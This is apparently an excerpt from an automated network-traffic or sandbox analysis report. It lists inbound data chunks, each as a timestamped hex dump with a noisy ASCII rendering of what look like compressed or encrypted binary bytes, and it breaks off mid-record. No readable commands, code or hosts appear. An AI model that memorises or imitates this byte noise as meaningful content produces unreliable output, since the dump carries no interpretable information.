84 a0 a6 66 c4 d2 6a 74 6e 64 47 8b 31 57 bc 28 d4 75 1e bc Data Ascii: lRJE~>`A>ii#1WUR@mnb;nvmzJ!fT/*4K<b2Xqf=tTDm}x[z;>1A^G-)$Z{+CR?hdbSuW'Y9`"2IFg]pVTZ?$dOmNjfjtndG1W(u
2021-12-01 15:23:14 UTC	397	IN	Data Raw: d2 b4 4e 5d 17 7d ab 0c eb 2c 3b 66 00 d9 a3 08 75 1a 02 ff c9 54 42 7c 43 98 15 89 a7 37 fc 89 48 13 b1 0b 67 41 1b 45 e8 02 43 3e 76 1b 2c c7 cc ca d1 72 0a 9a ec 19 93 cb 5c ee c7 dc 82 b8 b2 80 05 8e 61 b8 93 c0 a2 fc 97 c0 6a e3 74 7b a8 1a 0b 75 87 4a c5 85 ee 22 28 c9 d1 f3 a1 eb b4 50 c1 5b 01 4e a3 d0 16 0d 6f 76 83 de b1 d5 d0 af 88 e4 0e 19 82 e7 55 e0 ae dd 97 de 16 0f 4f c9 d2 7b 08 e5 9c 7f 75 e4 41 3e 64 c0 2f b8 2f a3 f1 68 61 15 00 4c 93 d2 f0 e0 0d f8 d2 f2 2e 56 af e2 89 27 25 a3 e1 95 3f aa 4b 27 a4 61 8f dd 50 45 83 e3 04 e1 80 1b 47 e5 f6 93 6c e4 1e ad 61 a3 6e d4 37 ea aa 01 c6 d0 fb c3 a9 e3 b5 67 5b 51 2e d6 89 a9 89 31 57 34 46 93 24 5a 7e 26 21 a8 86 06 15 19 d1 e5 83 be ab f5 98 1d 94 41 05 b6 b5 b8 31 42 9b f5 c7 a4 83 f1 cf Data Ascii: N]},;fuTB|C7HgAEC>v,r\ajt{uJ"(P[NovUO{uA>d//haL.V'%?K'aPEGlan7g[Q.1W4F$Z~&!A1B
2021-12-01 15:23:14 UTC	402	IN	Data Raw: 3d 1e c2 be 9d ee ad 24 de 9b f4 2e a5 06 61 07 f8 2b da fc 49 0c 1b 40 db ae 49 1b a2 6b 78 eb 2f 43 0a ee 37 fc ba 6b f6 c2 c7 51 2d de 58 1d e4 03 7d 19 0e 01 c5 8c 30 d3 bc bf a1 84 22 a8 92 b1 04 7c 9f f7 d0 e0 da e5 40 64 59 79 8c 2b db 8f 20 cd 06 73 37 e1 8a b9 06 e4 c3 d5 00 df 9e 7d 93 de c9 a5 25 a1 2e 57 bc 38 7c 06 f7 d5 90 ad 62 00 91 ce fa c0 9a 49 c9 49 96 c6 c6 de 17 8c e0 b9 ca 82 cf 58 a5 e2 9d d6 fa df cd c3 58 a8 91 c4 31 3a 3d 50 98 4a 8f 19 84 fb 25 37 64 de 0d 61 4b e9 5f 11 eb 10 14 0a 71 03 8b b4 c1 bb 19 91 a2 f0 b0 6f 7f 82 3a ad 0a 64 e7 87 a8 81 b3 18 da f2 a3 e7 55 82 d4 54 82 c6 5c 9e 81 d1 c4 7c 1a 06 f2 f0 97 0c e3 11 1e 23 b9 36 76 ff 3b a6 7f 71 62 ce 69 4f 24 b4 26 a3 f9 d5 6a 65 78 d9 1c a4 5b 46 86 29 dd 97 b6 d4 7f Data Ascii: =$.a+I@Ikx/C7kQ-X}0"|@dYy+ s7}%.W8|bIIXX1:=PJ%7daK_qo:dUT\|#6v;qbiO$&jex[F)
2021-12-01 15:23:14 UTC	406	IN	Data Raw: 06 fe c2 dd 9e 25 b0 8e 80 59 a6 ed be 3f e0 8a cc dd 76 02 87 28 94 46 01 cf 70 64 dc 89 57 37 1d bc d1 e1 0c 16 0b 0e e1 60 e1 94 49 05 6c 07 e9 c5 be cd 00 bb b5 14 ef 39 b7 bd 6a cf 7d 87 a2 93 2e 86 9d 60 44 1f 7d 93 34 26 bf bd 2c 18 55 ac 9f f1 30 c9 cf bd 37 07 36 af 52 b2 8a a3 3c 6e 7c f8 cf 84 a8 a4 9a be ea 68 79 9c 7d 1c 7c 97 a3 09 f7 a2 a4 7e f3 58 2d 93 3a 1b 48 5d 81 36 8e 85 77 9b 31 de e6 fc 00 5c 74 e6 05 e0 cd 47 da e3 2c 4d 19 5e d1 be bc 50 4e 36 79 dd 47 b4 a6 6e 23 30 63 fd 45 d5 6c 3d fb 31 3b 79 05 66 b0 41 bd 33 c5 93 63 d6 0f 14 df 8d 6a fc b5 c1 c2 50 a5 af 87 0e 1c 3b 7f ab fb 1d e8 22 30 6f a4 77 46 96 b5 ce 7e 81 ae c5 e9 13 94 48 46 18 7b 89 fa 99 df 5f 4e 45 e0 92 d9 7c 75 28 f7 db 96 94 f1 3b 66 28 cf f6 6f aa 96 b9 59 Data Ascii: %Y?v(FpdW7`Il9j}.`D}4&,U076R<n|hy}|~X-:H]6w1\tG,M^PN6yGn#0cEl=1;yfA3cjP;"0owF~HF{_NE|u(;f(oY
2021-12-01 15:23:14 UTC	410	IN	Data Raw: 6f b8 45 e9 4c fd 58 81 bf 2f 4a e8 20 c0 55 16 0c e3 8b a8 7b 1a 4a 75 af f0 c0 19 be 48 1e 74 02 c8 af f5 42 e3 19 c1 84 81 8c d9 f3 51 21 46 07 ac 89 20 c5 5b e6 6a 1b 2e 93 d2 74 69 e1 1e a2 f5 41 91 41 82 b7 61 d7 ea 12 8f 57 72 60 52 9f 39 64 5e fe d1 eb e7 1c b3 6f ec b3 64 53 b9 4a 16 80 78 81 21 d7 f6 d8 92 c1 c9 0a 7e 91 91 41 83 ad df 0e 9b ed 24 a1 dc 85 3d da 7e 8a 49 d2 6e 64 ad 9a c1 5d 94 d8 7b c2 18 8f 41 23 3c e1 7a 02 8d 5b a7 7d 0b 69 ed 28 50 af 0b 68 7b 0e 01 d3 f6 5e 2e 29 47 91 d2 9d 7d b9 26 26 21 a8 ed 3b 96 5e d9 67 43 77 1a 52 58 bc 63 44 a8 16 21 63 53 eb b5 59 b6 91 0a eb 71 63 24 a3 d6 3b fc 85 b2 13 74 f8 d6 73 74 ec 34 4f 45 0d bc a8 95 43 89 b2 90 5e d3 b3 19 17 7c 35 9e 33 33 4b 1e f4 a7 a7 9d 25 aa 88 f0 36 84 79 75 c2 Data Ascii: oELX/J U{JuHtBQ!F [j.tiAAaWr`R9d^odSJx!~A$=~Ind]{A#<z[}i(Ph{^.)G}&&!;^gCwRXcD!cSYqc$;tst4OEC^|533K%6yu
2021-12-01 15:23:14 UTC	414	IN	Data Raw: 00 d0 6b 55 2c 50 b7 bd a9 09 92 cf ea 37 16 8c bb 72 06 fb d7 85 31 f5 8b 42 9b f9 2c 1e 62 51 39 1a c7 b6 37 6c 59 2e 48 81 3a e4 0a 15 64 46 05 d4 fa 57 2c cb bb 27 ea b9 af 02 17 4e 5a 2c c0 14 1d be a9 9e e3 87 4c 6d ff 52 0f 89 ac 97 57 d5 64 80 ce fe 42 90 da e5 79 4f db 13 07 b3 05 6f 69 ed 35 ec c0 45 80 9f 01 51 30 4b 91 3f ef e3 78 09 64 d1 ee 29 21 bb bc 6a e2 0a e9 24 a3 b9 21 ad 16 9a ca c7 ae 61 ca 51 6d 68 e2 00 41 e3 8c 57 8f d0 ea 22 b1 fe 46 1d 4f d1 e8 47 07 eb b6 be ab 07 e5 dd ee 29 d7 72 7e 76 12 8e 15 98 5f 52 02 f5 c4 c3 5f 8d be 9d ff c3 43 14 9b 71 58 37 ed af 83 2a 92 ea 84 37 35 fe d6 7f 49 b6 05 73 a7 e7 11 6b 79 6d 9e f3 ba 28 60 db 6c 12 d4 e1 52 b2 4c 94 b7 c6 9e cc 5d 55 28 cb 52 4f c1 60 e8 b4 ad 12 85 37 8d 32 70 4f c2 Data Ascii: kU,P7r1B,bQ97lY.H:dFW,'NZ,LmRWdByOoi5EQ0K?xd)!j$!aQmhAW"FOG)r~v_R_CqX7*75Iskym(`lRL]U(RO`72pO
2021-12-01 15:23:14 UTC	418	IN	Data Raw: 01 c7 48 00 1c d5 fa aa 84 3f 74 fa 41 81 a8 5d 56 48 63 39 c5 a0 6b 71 6b 7d 0f f6 4d 96 49 19 72 17 7c 9f b8 40 0d d8 bf fd 6a 60 14 f4 d2 e0 88 ce e9 23 68 0b f6 d6 f3 ba 2b c0 bc 28 4e 7e 1c dc eb cd d3 8e 50 a6 f1 a6 78 87 85 a6 f2 2e 4b f7 2b 2d 5f 16 fc 25 37 1d 44 1f b3 11 5d b9 a3 68 0a 72 7b 64 51 d7 7f 6a 7e 92 45 e8 ca 30 0f 44 9c 7f 83 23 c6 c3 a0 93 22 bd 6d 9f 90 d6 67 af 96 44 8c eb 4c 16 f2 c4 59 a3 03 ee ad 05 8f 4c 7f 9e 85 48 76 5c 25 af 15 88 bf 11 80 f9 33 28 cc 8c d9 56 32 cb cf fb c3 47 cf 9e ef 44 73 f2 a6 92 cf e2 1a f0 a4 9a 5b af eb 4c c8 ae 9e 79 95 50 d6 fe b4 48 7c 95 8d 50 d3 cb 2b 00 7c 9d 2d 23 3a 64 4f a1 fa c4 0d 94 d6 12 0f 85 26 3e 7f 09 71 b2 9b 06 1c 49 47 f0 2f c2 59 3f f7 57 1c 2d 4d 13 90 a1 1a f0 b9 79 67 29 6d Data Ascii: H?tA]VHc9kqk}MIr|@j`#h+(N~Px.K+-_%7D]hr{dQj~E0D#"mgDLYLHv\%3(V2GDs[LyPH|P+|-#:dO&>qIG/Y?W-Myg)m
2021-12-01 15:23:14 UTC	422	IN	Data Raw: a6 81 a5 e3 7c 7f c6 5a b1 1e f5 df 5b c2 45 42 97 ca cf 79 6b 8c 64 72 69 7f 89 28 3f 55 be 35 ef ae 82 2e b7 c5 19 82 af 00 c7 c7 c3 fd a2 84 39 fd 44 e8 26 d3 07 45 88 28 50 67 46 5b af 80 55 26 2e 55 22 d7 91 e8 31 4f 38 74 7b 01 4b 04 f5 c2 31 48 bd 88 d8 e2 03 93 a0 26 a7 e8 24 e3 8e 9b 07 e0 82 32 41 12 04 05 8a 6f 2d 53 2b d3 e3 bf 80 98 69 6a f9 d3 79 75 69 35 d0 75 99 c5 c7 cd ec 8e b1 00 cc 40 03 7d 6e a8 4a 09 64 d8 63 20 29 23 40 9a d2 cb b3 6e f6 6b f0 d2 05 b6 79 b6 3d b8 55 bc e0 8a 6c 4c 89 b2 81 40 91 36 c7 c5 c7 c7 dc cb 66 37 98 fd 97 ea 1c b6 23 2c 91 14 d7 71 57 7f d1 7e 64 c8 0d 63 6b 30 7d 7a ee 89 4e c4 87 37 a0 53 4f 76 2e f9 9d 30 0d e9 f6 44 82 2b a9 33 e0 c9 97 1b 1c c8 91 07 73 29 e3 a8 7f 4e 67 8e cd 51 ed a2 92 f6 7b 20 e9 Data Ascii: |Z[EBykdri(?U5.9D&E(PgF[U&.U"1O8t{K1H&$2Ao-S+ijyui5u@}nJdc )#@nky=UlL@6f7#,qW~dck0}zN7SOv.0D+3s)NgQ{
2021-12-01 15:23:14 UTC	426	IN	Data Raw: 83 5f 9b fe 39 22 97 0c e3 43 06 01 a2 f3 21 55 12 dd a6 78 10 8e bc 7b 39 5f c6 b9 f0 2f 0c e5 74 6b f8 fd 3f 91 21 e9 be ab c5 ae f6 c9 c6 10 19 12 81 18 94 57 e8 39 14 ef e6 bf 6a f9 d7 f1 a9 de f6 cf 46 9b 3e 68 29 c2 27 5b cf e8 96 04 5c a5 e2 09 f3 cc 2c df 1a a5 1b db 93 c8 cb 48 67 b5 5c 72 8f 2a a8 f5 23 95 31 27 9e 8a 05 8b 30 01 cd 09 df 61 c4 01 42 06 f7 18 1a b0 e8 d7 fa 1f 4e 8a d8 18 c3 ef 3d 63 7f 42 93 21 c5 de 2b ca 8d c2 66 cd 5b cc 48 ef 72 f4 a2 2d 5d e5 80 00 50 44 ad e9 2f 11 61 b4 80 3f 5a ae 97 59 54 35 91 3c e1 c0 b7 a7 61 57 24 2d 1a 06 2d d7 6f 96 0d 0a 57 2f c2 57 65 c0 ca de 91 da fc c7 e8 39 f0 21 21 2f dd 0c 19 9f 13 00 46 85 59 df ab 5f 74 ef b5 f2 28 e3 18 42 4a 90 9b fd 3d 08 7b d8 c4 d1 73 64 f7 45 64 d9 63 84 89 53 ea Data Ascii: _9"C!Ux{9_/tk?!W9jF>h)'[\,Hg\r*#1'0aBN=cB!+f[Hr-]PD/a?ZYT5<aW$--oW/We9!!/FY_t(BJ={sdEdcS
2021-12-01 15:23:14 UTC	429	IN	Data Raw: 80 eb 49 9c ea 87 c3 a4 02 e4 03 b3 f4 be 3a ff 4b 74 6b 06 f2 20 f1 46 0d ed 4a 63 06 44 fd d6 e5 58 44 6e 6c 7e f9 aa 3c 1c 3c 67 9e d7 95 56 21 66 8c 82 51 3a 60 16 a6 94 ca 49 d4 a0 9f db 9a 4c 53 80 ff 5e 52 6d 34 a8 f4 5b 59 e2 a3 13 05 e9 65 7a 09 5e d8 fc d2 97 61 8f 7a f9 53 ba 6a b8 a8 ff c2 dd 59 81 41 81 33 19 f8 16 60 df 8b 6d cc 3d 7e 87 37 f7 c8 d4 a1 a2 0a f3 ad d3 d2 0b fb 52 2e 4e b1 15 c1 24 4c 9b f1 7a b4 49 88 b3 95 dd 80 07 3d 8d 92 5b 58 63 ed 4d 9e eb 23 a4 75 9e 49 3d d9 6c ed 70 45 f7 46 06 73 7b 8b a5 a4 3a 13 94 4e 7f 3e 99 5d c2 8d b3 01 47 57 00 a0 68 fb 5f 61 fb 06 5f b5 a1 76 7b 97 c4 d2 bf b7 52 b0 8d 67 f7 32 df 09 32 59 2f d6 a5 38 40 66 cf ab b9 ce 64 5a 89 a7 e5 87 8f 19 ef a8 9f 3d 4c 7f 1a 95 ad 1d a3 ec 74 35 96 46 Data Ascii: I:Ktk FJcDXDnl~<<gV!fQ:`ILS^Rm4[Yez^azSjYA3`m=~7R.N$LzI=[XcM#uI=lpEFs{:N>]GWh_a_v{Rg22Y/8@fdZ=Lt5F
2021-12-01 15:23:14 UTC	434	IN	Data Raw: 5f 58 58 45 2a 41 0f 9b ff 5d b1 e4 97 4a 71 fc d5 83 2b e3 61 bf a3 09 82 df 0b f3 be 5d cc 40 72 1c ac 78 f9 3f e4 7d 74 0e 7b b3 61 bb a3 ae 16 97 c9 d9 eb ae 6c 3f 41 da e7 7a 82 1b 72 ff d6 e9 47 ff b1 66 c0 a7 ee a3 17 63 cd d4 02 69 f7 2d 42 f7 36 83 29 27 b7 d8 7c 92 43 e3 13 9c 88 d5 68 8e b7 cd 20 e4 79 71 90 9d 12 e3 18 41 8f 54 ae 1e bd 37 11 53 94 86 2f 3e e8 18 c1 51 30 45 fe be e8 a2 7d 90 55 bf dc f4 cc 49 e0 87 3a 73 fe 2a bb cd da 00 d0 16 86 2e be 49 11 f1 57 d2 c1 10 23 01 36 ae 22 5f 16 66 fa a9 8b ed 3a f1 a5 74 65 4f c0 69 d5 b3 07 8c be fe 8f cd 43 1d 46 74 df 1a 16 19 80 92 a0 7d 12 83 a8 04 f0 b1 63 b6 5c 38 76 71 8d 5f 3f 83 de e8 ac d7 fe c4 dd 0d ed af eb 7d 2c 95 c3 be 34 6e 3e 6a fc 48 7d 71 22 c4 cc c4 d3 e3 77 75 04 66 d0 Data Ascii: _XXE*A]Jq+a]@rx?}t{al?AzrGfci-B6)'|Ch yqAT7S/>Q0E}UI:s*.IW#6"_f:teOiCFt}c\8vq_?},4n>jH}q"wuf
2021-12-01 15:23:14 UTC	438	IN	Data Raw: 1f f3 a6 69 76 08 60 53 21 60 db 6c 64 30 14 eb f9 08 ee 23 bb b8 3e 32 b8 f0 8a 2f c1 46 01 cb 61 a8 0d 3c 3f ff cb 40 a7 f2 df db de 16 06 e2 98 c6 c4 5e 46 b6 be ab 0f 7a e0 68 ce e5 85 be 20 53 84 ad 5a 57 42 f9 28 c7 27 3c 28 48 5f 08 1c 3a 7f 9e e6 be 15 0d e8 3a ee bb 26 b1 8e 4d 9c f9 dc 70 68 e8 3e 60 dc 07 ea ae 80 9b 57 3b 78 8a 35 6f 95 dd 17 08 ef 10 75 04 81 65 51 a6 a9 f0 2e 9c 7c 97 d2 42 25 9e ae 8e d9 16 fc 26 f8 b1 d8 ba a6 91 80 ad ec a5 ae 1d f1 b4 b0 95 c1 be 58 61 4a 8f d3 62 41 87 be ac 89 a4 a5 e7 66 ac 08 e5 86 3e 76 18 39 5b 5a ad 0b ff a7 ee e4 5a 59 3a 74 e3 15 27 0f 00 4c 87 23 28 5d cf 8c 25 3f 19 85 83 3a 6f 6a f7 c2 db 06 6f 7d 1b 0e 03 fb 4e be 33 1f b4 26 f7 31 c9 84 87 20 ee 2a c0 f4 f6 54 aa 9f fb 49 9f 52 57 b5 b1 07 Data Ascii: iv`S!`ld0#>2/Fa<?@^Fzh SZWB('<(H_::&Mph>`W;x5oueQ.|B%&XaJbAf>v9[ZZY:t'L#(]%?:ojo}N3&1 *TIRW
2021-12-01 15:23:14 UTC	442	IN	Data Raw: 51 28 ab 93 ae ba be ba bc b1 db 85 5c 2f 7d e8 d4 18 6b e9 58 be 34 c6 cd bb d7 97 82 4c 90 59 27 31 e8 25 22 18 d2 fb 44 08 d4 e8 8e 52 62 ba 4f cd b3 f7 b4 4a 7a 29 d4 fd ca cf 82 d3 16 96 b1 e7 b1 fa c8 b8 52 2f 1d a9 02 0d b9 fa c0 57 3a eb c1 8c c1 cb cd 5f d5 56 6c 0b 93 76 16 84 9e 6f b4 53 b7 a1 54 57 2a 84 35 4d 49 d1 61 ae 33 f4 a5 6e ad f9 b9 9b d1 88 b8 29 c6 e7 83 b2 9d f5 05 93 42 15 93 2e db 84 31 38 8f 9b 2c 5e ce fb 5f 61 5c 4e de d5 7b 07 cf b7 30 90 66 34 b7 80 34 b5 a4 27 51 5e 29 34 73 79 95 c3 40 91 4f 42 76 70 57 1f 59 b8 fc bb 47 89 81 67 02 2f b2 fd e1 7b 05 3f 35 6c 76 19 4f ac 8b 4f e4 a1 2c d2 f0 88 f1 0b a9 82 32 e7 5b ae 46 0b 60 76 c4 d7 a5 74 f2 93 08 10 c8 57 23 55 e7 96 84 a5 ea f2 f7 c5 9f 65 5f 80 d6 f8 f7 e3 62 a7 d5 Data Ascii: Q(\/}kX4LY'1%"DRbOJz)R/W:_VlvoSTW*5MIa3n)B.18,^_a\N{0f44'Q^)4sy@OBvpWYGg/{?5lvOO,2[F`vtW#Ue_b
2021-12-01 15:23:14 UTC	446	IN	Data Raw: fc a5 37 99 5f 47 f5 3f b9 3b ff a2 52 b2 8c 07 68 35 9a db f6 17 12 29 14 76 b4 a3 4c 4a 10 60 37 e9 2e ff c1 5b 5c 14 17 58 ab c5 0f a1 a1 e9 b5 ba 0b 74 b8 df a7 62 bb 12 e9 a8 88 39 4b 10 f4 ab 80 91 b0 a4 89 1d 57 b3 4e 07 7d 0d d6 7a 59 53 91 63 08 30 03 db a3 48 6b c7 42 35 fa 4e ed 5a 0d ed c4 70 79 25 82 16 c8 23 7f 6a ec 94 cc 97 37 ee 37 f5 34 ae 47 c4 c1 9c f7 77 0d 81 8e 50 a0 f6 2c 7b 86 92 0f f6 a7 47 0d 86 97 43 82 c7 42 0b 53 33 c6 df 09 17 4b a6 58 a1 ff de e1 0e da 2b 5f 20 f5 4e bf 4b bc 01 44 97 7f d1 45 be 8b 02 e1 ec 9a d2 52 9b 31 6a ca 1d 5f 22 0e 76 fa 41 81 ed b5 39 f1 17 3e b2 04 b1 26 d5 ea 8a 33 e1 a8 ef ce f2 24 5c 56 b0 ea ec 9d 16 09 1c 7b 2f d7 d7 61 b5 4c 19 e8 30 4c 70 f3 24 28 e2 1f 22 e9 a0 f3 68 f9 d2 f0 c4 6d ae 7c Data Ascii: 7_G?;Rh5)vLJ`7.[\Xtb9KWN}zYSc0HkB5NZpy%#j774GwP,{GCBS3KX+_ NKDER1j_"vA9>&3$\V{/aL0Lp$("hm|
2021-12-01 15:23:14 UTC	450	IN	Data Raw: d6 a2 e9 2e 20 f5 9a d2 01 84 b9 ff b9 5a b0 67 0d 8f b5 ee 95 f8 36 3b 71 f0 fd 80 8f ca 14 9b 28 2d 48 73 93 c9 69 52 70 85 a7 56 70 8c f0 64 ec 8b a1 be 2e cd 01 cd 0e f3 46 bd 8c 3a 74 1d 96 3d d1 f2 84 9c 1c 44 b3 a2 86 70 0e aa aa ad 0a 68 5e ec 75 1f 48 3d d9 d2 c8 bb ad 15 dd 3d 50 f8 b8 98 28 d5 6f de ed 98 37 c6 d0 e0 aa fb b1 56 9e cd 35 0e a2 00 ef a6 f3 71 66 c7 57 c7 b2 5f 82 17 8b 4f 2f 9f 95 9c 04 7a 08 55 60 28 90 cb 77 7d 89 a9 8d c8 fc d4 4d 34 e0 7a 52 17 9a 65 05 90 f8 4c 67 71 b4 09 90 bf 92 b6 82 c9 d2 8a a6 27 b1 80 6d 9a fe 77 1a e0 a3 4f db 7b 3b 01 c3 48 14 59 b6 fd f8 40 91 73 08 6d 5c 44 3a cf 96 bb 8f 3e e1 83 33 b7 ae c8 42 d7 85 5f 33 ee d2 77 fa 36 68 5f 45 66 e3 19 b6 ae f9 4d 40 8f c6 8f d1 70 98 d0 f3 05 83 db 2b 99 92 Data Ascii: . Zg6;q(-HsiRpVpd.F:t=Dph^uH==P(o7V5qfW_O/zU`(w}M4zReLgq'mwO{;HY@sm\D:>3B_3w6h_EfM@p+
2021-12-01 15:23:14 UTC	454	IN	Data Raw: 95 17 1f d2 79 30 c5 63 8c f2 59 e3 29 2b 54 c6 31 e4 16 bc c9 fd 2f f8 2d 3d 24 49 50 6f 74 f6 68 f2 e8 ce cc d8 2e ac 24 6f 3c c1 54 f2 9b 12 16 e3 e4 e6 ec b2 b0 de f1 bc 15 70 05 b2 0e 84 3c 1e 49 32 ad f8 56 2b b8 15 22 6f 63 6b 12 d4 ae 6e 00 50 0e f1 14 8b 37 8e f5 92 5f 81 39 12 98 ac da 59 39 d3 0b 5b 5c 3c 38 93 7c 4d 7c ba e1 59 43 02 37 0e 99 c6 67 92 82 bf 72 68 9f 70 e1 7a 7c 0f 16 9b e7 f6 64 f2 25 31 35 73 46 ae 58 9a 35 cc 5c 5f 65 30 bb e5 56 34 51 34 84 07 11 11 2b 57 d8 da ed a6 c9 b5 f7 9f 9b 28 8c cb 13 6f e6 72 61 06 7b 31 4c 29 b7 2a 30 5f 29 46 da 0e c9 a3 c1 cf be 75 f9 46 89 24 6f 3f 92 33 2b 6a d7 a5 3d 3f 62 29 52 12 85 a1 0c fa 0e 62 7e 25 0d 41 e6 e4 69 18 7b 4f e8 83 b9 a7 a9 c6 c3 8f 59 81 a4 ec 69 12 1d 76 01 c6 24 34 13 Data Ascii: y0cY)+T1/-=$IPoth.$o<Tp<I2V+"ocknP7_9Y9[\<8|M|YC7grhpz|d%15sFX5\_e0V4Q4+W(ora{1L)*0_)FuF$o?3+j=?b)Rb~%Ai{OYiv$4
2021-12-01 15:23:14 UTC	458	IN	Data Raw: d5 69 3e 3d fc be 66 c6 fe fa 4e da d5 91 6c 3c 37 1e 23 5e af e8 cf fe e5 af d7 0e 12 2c eb 53 54 7f 01 b7 5b f0 01 37 24 fc 9e df b5 2e 64 b9 dd 0a 57 2f 98 bb cf 19 8f 55 8f 12 bc ec 03 5a 83 88 4c 16 f9 de 99 13 ac 80 aa a2 36 8b fe a5 13 81 dc b3 f6 ac f2 4f 5d 9b 74 13 9a cc 0a bc 37 23 df fc 4f 42 f8 b7 5c d5 0b 0e f2 3d 91 cf b4 3c c1 2e 8d 23 65 a0 06 06 47 9b b1 47 0b 9e 7e 4e d6 3c d4 28 81 4f 91 03 bd 83 37 56 dc 1f 57 b4 8e 36 fd 09 84 0f 39 c3 65 5d e1 ca d1 f3 02 8d 80 48 62 22 f2 82 49 9e 51 74 ae 08 08 9f 2f 45 74 51 b3 89 b9 15 df 90 f8 e8 6d 97 8c dd 3e f5 b6 25 a6 ce 61 09 e8 10 3e ef 85 c5 cd 89 4b 29 d2 76 56 a7 55 60 38 5c ab 57 1b 67 93 ed 95 57 5e 4c c2 ee 6d be ff ba 97 6f a3 56 74 f7 f8 e9 11 b7 5b 61 6d 0a 82 75 db 56 22 43 87 Data Ascii: i>=fNl<7#^,ST[7$.dW/UZL6O]t7#OB\=<.#eGG~N<(O7VW69e]Hb"IQt/EtQm>%a>K)vVU`8\WgW^LmoVt[amuV"C
2021-12-01 15:23:14 UTC	461	IN	Data Raw: 7f 35 5f 96 0c 58 41 8c b4 f7 2d b8 31 5a e0 37 ca 41 3a c5 be 82 19 cb 5c 25 e7 c9 78 55 08 a0 b0 e7 55 27 ad 36 f7 9a d3 d1 ab f4 2e 32 8b 87 e6 48 4b 8c b8 bc 39 0b 13 f0 c1 3d 6d 98 53 2b 83 05 36 29 84 61 b2 5e 78 1b 7a 57 1f 57 a9 5c 25 6c 42 fe dd 40 4b 27 1e 05 34 9b 9c ee e0 26 38 da a4 3e d3 87 2d d1 a7 d0 4f 57 50 63 1d 8c 05 f3 f4 df 91 03 04 ec 3a 94 30 68 fa 96 b7 4d 3c 07 0d 84 fa 50 73 d8 ea 72 57 ac 45 d1 33 1a c1 90 31 cd 36 5e af 5b c3 cf 7f cd 52 96 57 74 6f 12 27 46 19 9b e5 9a 84 3d 52 53 89 1b 76 73 5c 5a 85 95 b3 81 5d ce 2f 1d 9a a6 21 d9 12 86 1f 53 20 58 7a a6 65 a7 ea 54 98 53 76 79 7a 29 50 db f4 17 bf 96 dd bf e4 68 d4 b1 e7 50 c0 a4 9a 1c 52 03 39 fe c9 5c 1d 01 05 b0 bf a3 37 b9 d3 25 90 0c f9 b9 e1 49 0d 88 0f e5 b3 87 f6 Data Ascii: 5_XA-1Z7A:\%xUU'6.2HK9=mS+6)a^xzWW\%lB@K'4&8>-OWPc:0hM<PsrWE316^[RWto'F=RSvs\Z]/!S XzeTSvyz)PhPR9\7%I
2021-12-01 15:23:14 UTC	466	IN	Data Raw: 0e c3 23 9e f1 83 e4 f9 cc 78 75 94 5f b4 89 af 5a 3f 15 ed ac 84 83 88 f5 f6 84 4e 87 af 48 3b e7 a8 e5 b3 11 f2 51 dc 66 ff e2 e9 f2 83 15 44 9b a1 15 8f 3a 74 20 15 52 68 9d 31 97 a0 ad 55 1b 69 b2 a7 71 c9 f9 e1 e7 2b fd 81 d4 fc a0 66 b5 50 d1 4f 43 69 aa a2 ed 25 c3 27 55 9d 7e 36 84 e3 41 16 cd bd 86 6d 8c d2 a7 90 b1 d5 6d 66 4a ff 66 53 24 39 e1 ba 01 08 f6 27 b7 de 9d 55 9e e4 2c 06 59 1a 3e 72 c5 2c 6c c3 ac 6a 3e a6 83 a9 3a fb 51 ba f5 be c4 fa d6 ec b5 53 af 98 6b 81 d4 e0 93 1a 8c 14 67 36 47 31 33 02 3b 94 79 c9 f8 44 68 db cc 2f 6d f2 54 1e 06 b6 cb 73 fe 8c 72 4e 27 ec af b2 37 d9 a4 71 a6 68 a3 b1 1f e6 26 60 9a 89 77 5b bc f6 8e bb 74 6d db d2 4a 24 58 90 7a 96 ee 1b 83 9f 0b dd 9f 8a 9a f4 33 4e 46 f1 59 61 9c d9 f6 b5 a6 02 ac 40 4f Data Ascii: #xu_Z?NH;QfD:t Rh1Uiq+fPOCi%'U~6AmmfJfS$9'U,Y>r,lj>:QSkg6G13;yDh/mTsrN'7qh&`w[tmJ$Xz3NFYa@O
2021-12-01 15:23:14 UTC	470	IN	Data Raw: a8 c7 02 bb 71 63 c4 c5 e2 03 32 28 36 6b 34 38 47 87 50 8c 7e 24 46 ae 65 f5 9b 03 43 16 0e 7f 54 25 a9 79 97 6f 21 3b e7 6a 60 6b ec 50 15 e5 6b 9e 84 c9 76 f7 31 6e d5 99 ad a2 21 15 e3 4b af 66 c3 8a 2f 4c c6 0b 52 e5 a8 33 d2 b3 3f 61 52 a1 bd fb a5 7c f9 2d ee 72 cd 95 56 45 13 9a 69 c0 c4 fc c4 17 b8 67 51 08 3d 49 a2 db 1c 90 14 91 18 19 f9 72 8d fc 1d 6a b7 b4 14 97 45 f2 03 42 cf 24 eb 24 8c 47 0f 52 8f 5a ca 47 71 3a e8 2f 44 d6 bd fc 90 3c 6d 33 ca 24 53 76 97 e9 3c a1 d4 a6 5a 57 9b 43 b9 41 9e c6 22 ae 25 7f 95 f1 45 de a7 7f 46 fd 49 bb 69 6f b8 66 23 81 27 27 57 36 42 99 f4 95 a8 8b c5 91 a2 81 5f d7 57 a5 1f cb de 4e 0a 0a 92 ba 35 dc 61 20 1f 4a 48 57 04 59 24 86 9d b2 9d ce 7d cd 1b f0 49 fd 9e 63 99 27 2e e5 7c d2 a2 73 a4 39 a3 24 e0 Data Ascii: qc2(6k48GP~$FeCT%yo!;j`kPkv1n!Kf/LR3?aR|-rVEigQ=IrjEB$$GRZGq:/D<m3$Sv<ZWCA"%EFIiof#''W6B_WN5a JHWY$}Ic'.|s9$
2021-12-01 15:23:14 UTC	474	IN	Data Raw: 4e 42 0e ef b6 0a 39 aa 87 85 39 63 28 b9 d9 20 5f 87 1a b4 c9 04 36 2e e0 f8 0a 35 f7 5e 19 26 a0 5a 9a 6d 08 87 6d 76 65 9d 71 c7 12 24 56 33 11 53 7d b1 f3 45 64 a6 52 db c7 8d 85 12 b3 8a 4d 88 27 1f 60 b0 d8 2a c1 f3 82 04 d8 90 06 3c eb 99 4e 92 7d e7 e4 cb 7c b2 e8 01 48 01 14 e5 e0 5e b6 bb a9 3d 18 e8 59 7a bb d1 86 dd 46 7b 6a bf 14 db 97 e2 29 f7 4d 9e 47 7f 9e ee e5 55 f6 8c 72 96 14 94 a6 39 27 b8 3a b8 1f 35 c1 9a e6 8e d4 1a 7b ba 0f a6 14 54 a8 84 a2 92 ec 8e 84 99 8b 20 a3 3a 14 c2 e9 61 59 98 23 13 f2 20 a2 5e 2f cd a2 da 00 94 3b 6b da 65 26 f5 ea 08 f0 a2 2c 71 3e b1 bf 00 f6 35 2d 02 b2 bb d3 45 af 29 41 78 c2 67 e6 a4 